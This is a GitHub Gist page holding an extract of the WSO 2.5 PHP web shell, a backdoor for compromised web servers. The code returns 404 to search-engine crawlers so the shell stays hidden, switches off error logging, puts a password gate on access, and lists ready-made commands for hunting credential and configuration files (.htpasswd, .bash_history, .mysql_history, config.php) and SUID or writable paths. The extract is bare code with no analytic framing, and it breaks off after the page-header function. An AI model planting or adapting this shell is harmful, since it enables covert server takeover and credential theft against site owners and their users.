Created
August 13, 2013 16:28
-
-
Save nroussi/6222944 to your computer and use it in GitHub Desktop.
WSO 2.5 Extract
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
if(!empty($_SERVER['HTTP_USER_AGENT'])) | |
{ | |
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); | |
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) | |
{ | |
header('HTTP/1.0 404 Not Found'); | |
exit; | |
} | |
} | |
@ini_set('error_log',NULL); | |
@ini_set('log_errors',0); | |
@ini_set('max_execution_time',0); | |
@set_time_limit(0); | |
@set_magic_quotes_runtime(0); | |
@define('WSO_VERSION', '2.5'); | |
if(get_magic_quotes_gpc()) | |
{ | |
function WSOstripslashes($array) | |
{ | |
return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); | |
} | |
$_POST = WSOstripslashes($_POST); | |
$_COOKIE = WSOstripslashes($_COOKIE); | |
} | |
function wsoLogin() | |
{ | |
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); | |
} | |
function WSOsetcookie($k, $v) | |
{ | |
$_COOKIE[$k] = $v; | |
setcookie($k, $v); | |
} | |
if(!empty($auth_pass)) | |
{ | |
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); | |
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); | |
} | |
if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; | |
$safe_mode = @ini_get('safe_mode'); | |
if(!$safe_mode) error_reporting(0); | |
$disable_functions = @ini_get('disable_functions'); | |
$home_cwd = @getcwd(); | |
if(isset($_POST['c'])) @chdir($_POST['c']); | |
$cwd = @getcwd(); | |
if($os == 'win') | |
{ | |
$home_cwd = str_replace("\\", "/", $home_cwd); | |
$cwd = str_replace("\\", "/", $cwd); | |
} | |
if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; | |
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; | |
if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" ); | |
else $aliases = array( "List dir" => "ls -lha", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "process status" => "ps aux", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" ); | |
function wsoHeader() | |
{ | |
if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; | |
global $color; | |
echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>"; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment